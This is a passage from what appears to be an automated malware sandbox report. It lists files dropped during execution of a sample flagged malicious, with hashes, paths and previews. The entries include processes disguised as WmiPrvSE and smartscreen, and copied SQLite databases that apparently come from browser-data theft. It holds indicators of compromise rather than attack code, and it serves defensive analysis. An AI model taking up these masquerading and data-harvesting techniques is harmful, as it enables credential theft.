                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

                                                                                                Download File
                                                                                                Process:C:\Recovery\WmiPrvSE.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):2126
                                                                                                Entropy (8bit):5.371983462188659
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs1HUHKVHzHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj10qVTqZ4T
                                                                                                MD5:135C39705E03FF05FF25EA2635542779
                                                                                                SHA1:C83DF8AC9DD1D98339BBAB63FB62816CBDB22B98
                                                                                                SHA-256:3F577910F11F685B33195C01A9A4138D00AB145B2BF3E8180B6C5363E92E2860
                                                                                                SHA-512:7ABAD821F047639F306A7C89127C00D00783E899A80F572EAEC3D87B2946177C3FA3BDFB17AE474DE330D8FAAAB7ED0A585683487AC7728F30AABFBDE655FB53
                                                                                                Malicious:true
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

                                                                                                Download File
                                                                                                Process:C:\Users\user\Downloads\smartscreen.exe
                                                                                                File Type:CSV text
                                                                                                Category:dropped
                                                                                                Size (bytes):847
                                                                                                Entropy (8bit):5.354334472896228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                Malicious:false
                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):19253
                                                                                                Entropy (8bit):5.005753878328145
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeQo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiQo+OdBANZD
                                                                                                MD5:81D32E8AE893770C4DEA5135D1D8E78D
                                                                                                SHA1:CA54EF62836AEEAEDC9F16FF80FD2950B53FBA0D
                                                                                                SHA-256:6A8BCF8BC8383C0DCF9AECA9948D91FD622458ECF7AF745858D0B07EFA9DCF89
                                                                                                SHA-512:FDF4BE11A2FC7837E03FBEFECCDD32E554950E8DF3F89E441C1A7B1BC7D8DA421CEA06ED3E2DE90DDC9DA3E60166BA8C2262AFF30C3A7FFDE953BA17AE48BF9A
                                                                                                Malicious:false
                                                                                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:data
                                                                                                Category:modified
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                Malicious:false
                                                                                                Preview:@...e...........................................................

                                                                                                C:\Users\user\AppData\Local\Temp\0L4O4hE8bk

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\2T5y90L7U1

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\3ZKW2VgUXF

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):98304
                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\6OUT67hm4H

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.6732424250451717
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\J4cfRhQZaM

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.136413900497188
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                MD5:429F49156428FD53EB06FC82088FD324
                                                                                                SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\PuOdCpi2kH

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.8439810553697228
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\YtBWM7vFD0

                                                                                                Download File
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                Category:dropped
                                                                                                Size (bytes):196608
                                                                                                Entropy (8bit):1.121297215059106
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\ZQ41MPITjV

                                                                                                Download File
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):25
                                                                                                Entropy (8bit):4.163856189774723
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:zCheECj:zChhQ
                                                                                                MD5:457BCBEA190F22248B3DE296E7F9CEE7
                                                                                                SHA1:0B93BCF7DA400D1844CF00B0FC4F2CF3AE0743C0
                                                                                                SHA-256:56BD2DD5A963BA3914E2FEC0C04FF9275581101D7554EC9D9DD47A7AC70F562B
                                                                                                SHA-512:F7A1C3792F9321B54447D6A67F21B48A5E6AEC243CA9A0EBEE2A0BF58E375E86BFC8583ACD9E53116EB2FE443E165B81CE63F6CD278F7C357D404E475A38570D
                                                                                                Malicious:false
                                                                                                Preview:CzKgKAx06tobJqCcItsgp0YIl

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02g3h04h.sk2.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0y5s0oav.fnm.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_12jfnl1l.tez.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_14tfo2uk.lfq.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1hqotscj.xit.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_22aojx0j.bhc.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23tgjldy.jeg.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gunwnmh.qab.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2lx4n3ii.y4v.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
